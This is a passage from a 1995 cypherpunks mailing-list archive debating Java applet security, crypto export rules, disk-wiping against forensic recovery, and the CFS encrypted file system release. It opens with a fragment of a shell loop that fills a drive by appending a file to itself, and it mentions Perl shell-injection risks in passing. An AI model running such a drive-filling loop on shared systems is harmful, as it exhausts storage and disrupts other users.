ls -l >>killme.txt
cat killme.txt >>killme.txt
filldrive

But be careful not to run this when other folks are on, or if you're not 
the sysadmin as you'll overrun your quota very quickly.  (The above 
wasn't tested, and I'm not sure if under unix you can append a file to 
itself, etc. so #include <stdwarnings_n_disclaimers.h>

> At the most serious level of attack (the "threat model"), such as the FBI
> labs in Quantico or the NSA, there are reports that specialized disk drive
> heads are used to recover earlier signals that are not erased even with N
> active overwrite steps (apparently the head jitter in most drives means
> that each write cycle is slightly different, even on the same disk region,
> and a slight "shadow" or "ghost" of previous writes can sometimes be
> extracted).

In this day and age drives are getting smaller and smaller while the 
capacity increases. This means the tracks are smaller and the data spill 
caused by the jitter is smaller and smaller tending towards almost 
useless.   I really think our TLA friends are having a harder 
time at this than usual.  But suffice to say I still do a wipe three or 
four times anyway.  i.e. It's easy to do something like this on a 5.25" 
full height 40MB MFM drive, but on a 4GB 3.5" LPS drive, much, much harder.

(I guess though, I must be paranoid though as I did buy a nice big bulk 
eraser built for floppies. <evil grin>)

> --Tim May, who hopes this will not reignite the thread about how to use
> thermite to permanently erase disk drives

Ditto.


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Fri, 28 Jul 95 09:08:55 PDT
To: jon cameron <cellf@free.org>
Subject: Re: PS/2 passwd bypassed at bootup?
In-Reply-To: <Pine.BSD.3.91.950727201615.20637H-100000@squeaky.free.org>
Message-ID: <Pine.BSD/.3.91.950728115929.24958N-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Never heard of such a disk.  However, I'm not sure it can be disabled as 
it's in CMOS, and it the PS/2 (Half a personal computer?) I remember with 
this password crap didn't even do a floppy seek, so if they don't read 
the A: drive, how can there by a boot admin disk?  (I may be wrong, but 
that's what I remember.)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Fri, 28 Jul 95 09:16:00 PDT
To: perry@piermont.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281530.AA18869@snark.imsi.com>
Message-ID: <9507281615.AA23005@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Thus spake Perry:
|> solman@MIT.EDU writes:
|> > I disagree for the simple reason that Java and Hotjava are not being
|> > treated as trusted code in their applications. Applets are tightly
|> > contrained in what they can do,

|> You are incorrect. Applets are DESIGNED to be tightly constrained in
|> what they do. You want to bet your career that there are no bugs in
|> the implementation of this design? The thing keeping you from opening
|> sockets or doing file-io is a very thin scrim. Are you *certain* that
|> it is bug free? I'm not.

What's with the facetious questions? Only an idiot would guarantee a piece
of software to be error free. I am highly confident that there is very
little probability of a raider applet doing significant damage. That's as
much as I can say of any of of any of the systems I use... and its saying
alot given that the thing is executing code it pulls off the net. Is there
still room for cleaner code? Definitely, and I think we'll see some of it
as Java goes Beta and then production.

|> I like systems that are more fail-safe. About half a dozen
|> simultaneous bugs would be needed to break some of my more secure
|> firewalls, for example. Java does *not* provide security in depth.

I think that the high level architecture of Java provides as much security
as such a product can possibly provide. By the time Java becomes widely
distributed (it is still in Alpha3), I expect it to have features that deny
access to any applet not signed by somebody in a list the user creates, a
sort of web of trust. On top of this layer, Java already offers rudimentary
firewalls. The combination of these layers should be quite effective.

Of course, Netscape will probably find a way to screw their implementation
up :)

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 09:24:38 PDT
To: perry@piermont.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281410.AA07271@snark.imsi.com>
Message-ID: <199507281624.MAA11581@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Ray Cromwell writes:
> > 
> >   Just a quick note to chime in. The OSF just did a deal with Sun
> > to port Java to several platforms. The OSF is opening a "web mall"
> > where you can grab software objects and run them. Expect to Java
> > *really* take off in about 2-3 months. Every business on the net is going
> > to want a Java shopping-client-basket on their web-mall/web-store.
> > (Web Consultants! Learn Java!)
> 
> As a security consultant, I'm very happy about Java because once the
> holes are found in it and massive, Morris style worms are launched
> with it, I'll be laughing all the way to the bank.

  Holes have already been found in CERN HTTP. The GETS() style bug
was in the first few versions allowing attacks to overwrite the
process stack. Any mail server written in perl is susceptible
to weird attacks. For instance, if you ever eval/exec any variable
that is double-quoted, rather than single quoted, it is possible to
run shell commands via backtics or shell subprocesses in variable names.
In fact, can you even prove that elm or pine don't have some obscure
bug wherein a certain message, say with malformed headers, can
overwrite the stack and allow Morris style attacks? The "Good Times"
virus may actually be possible. 

  Security is very nice to have. it's nice to rely on. But sometimes 
there's a need for some liberty. Make everything as secure as you
can, but if security prevents you from doing something that you want
to do, it's not helping you. The internet would be a very cold and 
barren place if the only application people ran was mail.

  Object Oriented Superdistributed components are so useful an abstraction,
I think it's worth the security risk. HotJava solves some fundamental
issues with protocols. Right now the W^3 working groups have been struggling
to define URI/URCs and a whole host of other web protocols. They've been
doing it for years, but they suffer from Xanadu like problems as far as
I can tell. They don't want to saddle the web with a bad protocol, so 
they search to define a perfect one. Hence, no prototypes are ever
deployed, because if they were, the user community might make them
a defacto standard and lock them into it much like MS-DOS locked
PCs into the Dark Ages. With Java, you define all the protocols you
want. If your browser doesn't understand how to fetch a protocol,
it can fetch a protocol handler. There's no need for a kitchen
sink application that understands every protocol in existence.

  And with HotJava, you don't NEED to automatically fetch an application
and run it. You can just use it as an extension language. If someone
defines a new application or protocol handler for it, and this person
is fairly trusted on the net, you can decide to run it (kinda like
turning off autoload images), and even review the source code first.
This is no less secure than ftping software from some site and compiling
it.  

  Maybe for you, the issue is protecting corporate networks behind firewalls.
That's good, well then don't let employees run HotJava. However, I look at
it from the home slip/ppp'ed user standpoint. I think over the next two
years, slip/ppp'ed users will displace corporate/academic users as the
largest group on the net. 

  There will be worms and viruses. Just like there are nowadays. And there
will be fixes. And there will be yet another arms race between virus
writers and people who write anti-virus software. No doubt, there will
be HotJava based worm/virus scanners, etc. A new market will come into
being. You'll make money off of fixing holes. I'll make money off
custom java clients business web pages. It's the price that should be
paid, that is always paid, with any new technology. I'm not advocating
being careless. I'm just saying that paranoid security hampers 
development of more robust and better software. HotJava is a piece
of low-hanging fruit. As more people use it and more problems are found,
better fruit will be found.

-Ray








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 09:29:42 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281504.AA06867@sulphur.osf.org>
Message-ID: <199507281629.MAA12905@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



re: OSF's mall. 

  Ah, I misunderstood what they were trying to do from an abstract. Now
it's much less exciting. They are just in effect running a beta ftp
site on an http server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 09:33:40 PDT
To: solman@MIT.EDU
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281615.AA23005@ua.MIT.EDU>
Message-ID: <9507281633.AA27805@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



solman@MIT.EDU writes:
> What's with the facetious questions? Only an idiot would guarantee a piece
> of software to be error free. I am highly confident that there is very
> little probability of a raider applet doing significant damage.

I see little reason for such confidence.

> |> I like systems that are more fail-safe. About half a dozen
> |> simultaneous bugs would be needed to break some of my more secure
> |> firewalls, for example. Java does *not* provide security in depth.
> 
> I think that the high level architecture of Java provides as much security
> as such a product can possibly provide.

Thats far from true as well. The Java interpreter could have all its
I/O abilities removed, for example, rather than relying on correct
implementation of the possibly correct language model to keep users
from performing I/O. -- I can name lots of similar things.

Having designed systems to be as secure as possible, I'd say that Java
violates lots of the constraints. Its too big, too complicated, and
relies for its security on the correctness of its implementation.

> By the time Java becomes widely distributed (it is still in Alpha3),
> I expect it to have features that deny access to any applet not
> signed by somebody in a list the user creates, a sort of web of
> trust.

Again, this depends on the correctness of the implementation.

> On top of this layer, Java already offers rudimentary
> firewalls.

What?????

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 09:37:06 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507281624.MAA11581@clark.net>
Message-ID: <9507281636.AA28295@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>   Security is very nice to have. it's nice to rely on. But sometimes 
> there's a need for some liberty. Make everything as secure as you
> can, but if security prevents you from doing something that you want
> to do, it's not helping you.

Yes it is.

I know lots of users that would like to do certain dangerous things,
but they are better off not being able to do them because if they
could very likely the security problems would mean in six weeks their
company would be bankrupt and they wouldn't have a job.

Not all cool things are desirable things.

I suspect that the java-like methodology of downloading small apps to
users can be done securely, but the java model doesn't feel like the
right way to do it, at least to me.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew D Meredith" <meredith@ecid.cig.mot.com>
Date: Fri, 28 Jul 95 04:38:59 PDT
To: cypherpunks@toad.com
Subject: Hooks to Crypto (was Re: NSA and the NCSA/Apache web servers)
In-Reply-To: <9507281039.AA13694@all.net>
Message-ID: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 28, 12:18pm, Dr. Frederick B. Cohen wrote:
> Subject: Re: NSA and the NCSA/Apache web servers

> Actually, neither hooks nor encryption are unexportable, you
> just need a license to export them.

>-- End of excerpt from Dr. Frederick B. Cohen

I hope I'm not alone in wondering why on earth this is the case.

Ok, exporting cryptography from the USA is restricted, and highly
controversial. I think there has been something on this one already.

But what is it, in the legal wibble, that make _hooks_ to
cryptography restricted. How have they worded things to make this the
case.

The hooks are of course completely useless in and of themselves. You
can only do anything useful with them if you have the matching crypto
package.

Yours a confused Brit ... who doesn't have this problem ... yet!!

--
___________________________________________________________________

Andrew Meredith
 Senior Systems Engineer           Tel: (direct) +44(0) 1793 545377
  Network Engineering Tools Group  Tel: (main)   +44(0) 1793 541541
   Motorola ECID                   Fax:          +44(0) 1793 420915
    16, Euroway, Blagrove
     Swindon SN5 8YQ, UK       email: Andrew_Meredith@email.mot.com
___________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 28 Jul 95 09:54:31 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Java, Netscape, OpenDoc, and Babel (NewsClip)
Message-ID: <9507281654.AA07397@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>On the other hand, a Java object brokerage service sponsored by OSF

OSF has no current plans to do this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 10:03:03 PDT
To: perry@piermont.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281636.AA28295@snark.imsi.com>
Message-ID: <199507281702.NAA22816@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I suspect that the java-like methodology of downloading small apps to
> users can be done securely, but the java model doesn't feel like the
> right way to do it, at least to me.
> 

  I agree with you. However, I think the only way to get a handle on
what the security issues are of such a methodology, is to deploy one
and see what happens. Then you can build a second generation 
environment based on that knowledge. There's also the issue that
even if the environment is secure on paper, with an application as
large as a browser and an execution environment, you can never
know if it was implemented properly. Sendmail-like bugs could haunt
the system for years. That's why its good to deploy it early, fix all
the big holes discovered as fast as possible. At minimum though, I think
Java should atleast run chroot()ed on Unix systems. Instead, their 
approach is to define a "writable" directory on disk that apps can write 
too. This does make me nervous because I can see the potential to send 
over a program to be compiled and executed. I don't know what you would do
under the MacOS and Win95 to make it secure. There is also security
at the meta-applet level. Even if you chroot() Java to some directory
where applets can write to, one applet can destroy another's data. If
the data saved by one applet is valuable to you, like hotlist settings
gathered over months, a rogue applet can trash them. But sometimes
applets need to be able to read/write each others data so you can't
just disallow it. So HotJava should have a access protocol for applets
too. The Java team could learn a lot from the experience LambdaMOO.

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 28 Jul 95 10:17:48 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507281624.MAA11581@clark.net>
Message-ID: <9507281717.AA09190@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray writes:

|   Object Oriented Superdistributed components are so useful an abstraction,
| I think it's worth the security risk. HotJava solves some fundamental
| issues with protocols. Right now the W^3 working groups have been struggling

	Its nice of you to say that.  Its nice of Perry to disagree.
Lets start using some concrete examples, so the source of
disagreements become obvious?

	I suspect Ray is working in an environment less security
concious than Perry's.  Perry works on a lot of security-critical
applications where a lot of money is at stake.  If I were going to go
after financial institutions, I'd definetly look at which ones were
using Java, and see what I could upload into their systems.  Getting
copies of the recent files might be *very* informative.  I'd be
worried if I were at Solomon brothers.

	If I were running Java at home, I'd be a lot less worried,
especially as all the interesting data on my hard drive sits on an
encrypted partition.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 28 Jul 95 10:17:52 PDT
To: cypherpunks@toad.com
Subject: New release (v1.3) of CFS Unix encrypting file system now available
Message-ID: <9507281720.AA03779@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Source code for the latest version (release 1.3) of CFS, the Cryptographic
File System, is now available upon request for research and experimental
use in the US and Canada.

CFS pushes encryption services into the Unix(tm) file system.  It
supports secure storage at the system level through a standard Unix
file system interface to encrypted files.  Users associate a
cryptographic key with the directories they wish to protect.  Files in
these directories (as well as their pathname components) are
transparently encrypted and decrypted with the specified key without
further user intervention; cleartext is never stored on a disk or sent
to a remote file server.  CFS employs a novel combination of DES
stream and codebook cipher modes to provide high security with good
performance on a modern workstation.  CFS can use any available file
system for its underlying storage without modification, including
remote file servers such as NFS.  System management functions, such as
file backup, work in a normal manner and without knowledge of the key.

CFS runs under SunOS and several other BSD-derived systems with NFS.
It is implemented entirely at user level, as a local NFS server
running on the client machine's "loopback" interface.  It consists of
about 5000 lines of code and supporting documentation.  You must have
"root" access to install CFS.

CFS was first mentioned at the work-in-progress session at the Winter
'93 USENIX Conference and was more fully detailed in:

    Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM
    Conference on Computer and Communications Security, Fairfax, VA,
    November 1993. (PostScript available by anonymous ftp from
    research.att.com in the file dist/mab/cfs.ps.)

and in

    Matt Blaze. "Key Management in an Encrypting File System", Proc.
    Summer '94 USENIX Tech. Conference, Boston, MA, June 1994.
    (PostScript available by anonymous ftp from research.att.com
    in the file dist/mab/cfskey.ps.)

Version 1.3 of CFS also includes ESM, the Encrypting Session Manager.
ESM provides shell-to-shell encrypted sessions across insecure links
and requires no OS or network support.  It is useful for typing cfs
passphrases when logged in over the network.  ESM needs RSAREF 2.0 to
compile and is tested only on SunOS and BSDI.  ESM is the first released
part of a suite of session encryption tools that are described in

    Matt Blaze and Steve Bellovin. "Session-layer Encryption."
    Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995.
    (PostScript is available from
    ftp://research.att.com/dist/mab/sesscrypt.ps)

The new version of CFS differs from the version described in the
papers in a few ways:

* The DES-based encryption scheme has been strengthened, and now
provides greater security but with the online latency of only single-DES.

* Support for the smartcard-based key management system is not
included and a few of the tools are not included.

* An impoved key management scheme now allows chaning the passphrase
associated with a directory.

* The performance has been improved.

* The security of the system against certain non-cryptanalytic attacks
has been improved somewhat. 

* User-contributed ports to a number of additional platforms.

* Hooks for adding new ciphers.

* 3-DES and MacGuffin encryption options.

* Timeout options allow automatic detach of encrypted directories
after a set time or period of inactivity.

CFS is distributed as a research prototype; it is COMPLETELY
UNSUPPORTED software.  No warranty of any kind is provided.  We will
not be responsible if the system deletes all your files and emails the
cleartext directly to the NSA or your mother.  Also, we do not have
the resources to port the software to other platforms, although you
are welcome to do this yourself.  The software was developed under
SunOS and BSDI, and there are also unsupported user-contributed ports
available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix.  We really
can't promise to provide any technical support at all, beyond the
source code itself.  We also maintain a mailing list for CFS users and
developers; subscription information is included with the source code.

Because of export restrictions on cryptographic software, we are only
able to make the software available within the US and Canada to US and
Canadian citizens and permanent residents.  Unfortunately, we cannot
make it available for general anonymous ftp or other uncontrolled
access, nor can we allow others to do so.  Sorry.

Legal stuff from the README file:

 *              Copyright (c) 1992, 1993, 1994 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.  You may
 * not export it, in whole or in part, or cause or allow such export,
 * through act or omission, without prior authorization from the United
 * States government and written permission from AT&T.  In particular,
 * you may not make any part of this software available for general or
 * unrestricted distribution to others, nor may you disclose this software
 * to persons other than citizens and permanent residents of the United
 * States and Canada. 
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

If you would like a copy of the CFS source code, please read to the end
of this message and then send email to:

	cfs@research.att.com

DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
that you are in the US or Canada, are a citizen or legal permanent
resident of the US or Canada, and have read and understand the license
conditions stated above.  Be sure to include an email address in a US-
or Canada-registered domain. The code will be sent to you via email in
a "shar" shell archive (a little over 300K bytes long).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 27 Jul 95 20:20:15 PDT
To: "Amir Y. Rosenblatt" <axon@neuron.net>
Subject: Re: NSA and the NCSA/Apache web servers
In-Reply-To: <Pine.SOL.3.91.950726103519.23445C-100000@pipe6>
Message-ID: <9507280320.AA28749@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


  
"Amir Y. Rosenblatt" <axon@neuron.net> wrote:
  Wow -- hooks to encryption are unexportable -- now THAT's bullshit.  Sheesh.

A few yuears ago I asked Matt Blaze if he would
publish CFS with the sryptography removed, and he
told me that AT&T's lawyers also believed this to
be true. (So, of course, his answer was "No".)
The hooks are as important as the crypto code.

Interestingly though, Kerberos made it to
Australia (Bond University I think) legally.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
French's Forest         co-mod sci.crypt.research
NSW 2086 Australia.     USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 10:25:56 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281717.AA09190@leonardo.bwh.harvard.edu>
Message-ID: <9507281725.AA05535@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	If I were running Java at home, I'd be a lot less worried,
> especially as all the interesting data on my hard drive sits on an
> encrypted partition.

Not everyone is so careful. To most people, their personal financial
information, especially if it allows embezzlement from their accounts,
is probably as valuable to them as a banks's information is to
them...

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 28 Jul 95 10:40:26 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Sat phone permit "wire"taps
In-Reply-To: <199507272254.AA06257@tyrell.net>
Message-ID: <Pine.D-G.3.91.950728133852.23404F-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jul 1995, Phil Fraering wrote:

>    From: Ted_Anderson@transarc.com
> 
>    I found these paragraphs in a recent Space News interesting.  They were
>    at the end of an article titled "Military Officials Open To Using
>                                     ^^^^^^^^^^^^^^^
>    Civilian Links" in the July 3rd issue. 
> 
> [...]
>      "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
>    features to permit authorized eavesdropping, officials said. 
                        ^^^^^^^^^^

Did you miss this word?  While I suspect that you don't like Title III 
wiretaps, they are legal at present.  The above contemplates legal 
wiretaps on some phone service that might otherwise be outside the reach 
of legal wiretaps.

> Hmm. Anyone here ever heard of the Walkers, or the 
Rosenbergs? > 
> It's a pity that the military has decided that in its zeal to listen
> in on phone calls, that national security is an expendable asset.

The military is not authorized to listen in to any phone calls they want 
to hear.  Otherwise, everyone on the list, including me, would probably 
be in some hidden military prison.

:-)  for the humor-impaired.

> It looks like the Chinese or Russian Armies won't be any better by
> the time they're occupying us, unfortunately.
> 
> (The really awful part is that what friends I have that are current
> or past U.S. military don't want to die, AFAIK).
> 
> Phil
> 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 10:54:29 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281717.AA09190@leonardo.bwh.harvard.edu>
Message-ID: <199507281754.NAA11499@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Ray writes:
> 
> |   Object Oriented Superdistributed components are so useful an abstraction,
> | I think it's worth the security risk. HotJava solves some fundamental
> | issues with protocols. Right now the W^3 working groups have been struggling
> 
> 	Its nice of you to say that.  Its nice of Perry to disagree.
> Lets start using some concrete examples, so the source of
> disagreements become obvious?
> 
> 	I suspect Ray is working in an environment less security
> concious than Perry's.  Perry works on a lot of security-critical
> applications where a lot of money is at stake.  If I were going to go
> after financial institutions, I'd definetly look at which ones were
> using Java, and see what I could upload into their systems.  Getting
> copies of the recent files might be *very* informative.  I'd be
> worried if I were at Solomon brothers.

  If a business wants high security, they probably shouldn't be running
anything but mail. Even allowing users ftp access is dangerous
because someone could download a trojan horse. My college  took
the /exec function out of IRC for this very reason. If data can 
get  through a firewall by any means, DNS, mail, etc, it's possible to write
some kind of program to send stolen information on those channels. Hell,
there is a big enough problem with users bringing software from home
into work and infecting company networks with viruses.
  
  I work in an environment which is very security conscious (IBM Watson 
Research). You should see how paranoid their virus lab setup is.
And I'm frustrated by not being able to run stuff from work I run at
home because of the firewall. I probably shouldn't be running the
stuff at work anyway, but I can't pass up having access to a T1/T3
net connection on my desk. I have no problem with security, as long
as it is user friendly. If everyone had to manually run PGP from the shell
to post a message to cypherpunks, would there be many posts? 

  At home however, I have full control over my environment. I don't
avoid all potentially dangerous software, because for me, the benefits
outweigh the risks. I have never seen the source code to DOOM's
internet drivers, so I have no way of knowing if data is being stolen
or downloaded to my harddrive. I would rather choose to encrypt
the harddrive, and run the software in an alternate partition even though
this still doesn't guarantee safety. I know people who go farther such
as swapping HD's in-and-out depending on whether they are in "fun, 
experimental computer use mode", or "serious, money risking mode"
But ultimately that decision is up to me. Most of the people who will
be running HotJava are users in non-corporate environments. 

  Once you actually browse some HotJava web pages with HotJava, the
ordinary Web becomes static and boring. It's like the difference between
ftp and Netscape, or TinyMUD and LambdaMOO. There's just so much
potential, especially for crypto-clients. Because Java provides a
single development platform, single execution environment, GUI, and
network access.
 
-Ray
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Fri, 28 Jul 95 14:16:03 PDT
To: cypherpunks@toad.com
Subject: Mail2news Gates
Message-ID: <1ef_9507281405@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



[Please respond via netmail - I have only intermittant access to list]

Can someone send me a list of functioning mail-2-news gates?

Suddenly, @news.demon.co.uk, which has worked well for ages, is rejecting
posts:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+

	Subject: Article rejected
	Date: Fri, 28 Jul 95 1:36:41 +0100
	Sender: news@dispatch.demon.co.uk

	You do not have posting privileges via this mail2news gateway.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+

This is troubling, as I have not found another gate that carries my regional
heirarchy.

Also, is there a method by which one can access (via netmail) a list of the
newsgroups served by a given mail-2-news gate?

Thanks for any help.
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "greg pitz" <a_friend@mail.onetouch.com>
Date: Fri, 28 Jul 95 14:47:22 PDT
To: postmaster@censored.org
Subject: Re: carol....
Message-ID: <9507282147.AA08308@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> In general, it isn't necessary to CC the world on your first interaction
> with a customer service department; perhaps if you had sent us several
> messages and we hadn't answered you, this would have been an appropriate
> response.  As it is, the situation is almost certainly either a human

Sigh, but you haven't had the pleasure of getting to know Carol & her 
ways as we have.....
 

.................................
pitz@onetouch.com
greg pitz                 ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew D Meredith" <meredith@ecid.cig.mot.com>
Date: Fri, 28 Jul 95 06:52:17 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Hooks to Crypto>
In-Reply-To: <9507281300.AA22773@all.net>
Message-ID: <9507281450.ZM15992@jurua.sweng.ecid.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 28,  2:09pm, Dr. Frederick B. Cohen wrote:
> Subject: Re: Hooks to Crypto>
> ...
> > > Actually, neither hooks nor encryption are unexportable, you
> > > just need a license to export them.
> ...
>
> > I hope I'm not alone in wondering why on earth this is the case.
>
> They don't want to encourage encryption if they can avoid it.  It
> impairs their ability to gather intelligence.

I kind of meant "why they think they can" rather than "why they want
to". One can't really help being aware these days what the US
government (and indeed many others) are trying to do.

> Legal? What makes you think so? It hasn't made it to the courts yet

Oh ... I see ... just like the rest of this stuff, only more so.

> because people in the US aren't willing to risk jail for over their
> right to do it.  The only court case I am aware of was the RSA case
> and in that one, the courts ruled against the NSA - but in today's
> political and economic environment, people who do cryptography
> don't want to risk it.

Judging by the PZ case, I can't say as I can really blame them. it
would be better of course if they would go for it, but ...

> > The hooks are of course completely useless in and of themselves.
> > You can only do anything useful with them if you have the
> > matching crypto package.
>
> Not really right.  It's very easy to change a compression hook
> into an encryption hook using standard off-the-shelf shareware,
> public domain software, or commercial products.

I probably should have written "a crypto package" instead of "the
matching crypto package".

This would infer that anything that can cause information to be piped
out to a package and then the result sucked back in would fall into
this category.

Hmmm

map ^Xe :,$! /bin/sh -c 'pgp -feast 2>/dev/tty^V|^V|sleep 4'^M^L

Everyone DELETE VI NOW !!! >;)

> > Yours a confused Brit ... who doesn't have this problem ... yet!!
>
> Don't bet on it.  If you really try to export top-flight encryption
> technology in a big way, you may find that your government can be
> just as opressive as mine.

Our lot tend to work in a different way to yours. Similar end result
of course, but different approach.

So when I said "yet". I was meaning that, at the moment, we have no
laws specifically refering to Cryptography and it's export, but the
approach I can see being taken would be:

1 - Find yourself a tenuous link with some Psycho-Baby-Killer group.
2 - Start a "This must be stopped" campain.
3 - Propose the "Internet Pornography Act"
4 - Shove it through before anyone can get together enough
    opposition to get it squashed. (and that would have to be a
    GREAT DEAL of opposition).

That's how they did the "Criminal Justice Act" which breaks both
European and International law in a great many places. That's how
they'll do the "Internet Pornography Act". It'll be just loose enough
to include just about anything they want it to.

>-- End of excerpt from Dr. Frederick B. Cohen


Andy M




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Date: Fri, 28 Jul 95 06:04:28 PDT
To: Greg Broiles <greg@ideath.goldenbear.com>
Subject: Re: copyrighting algorithms
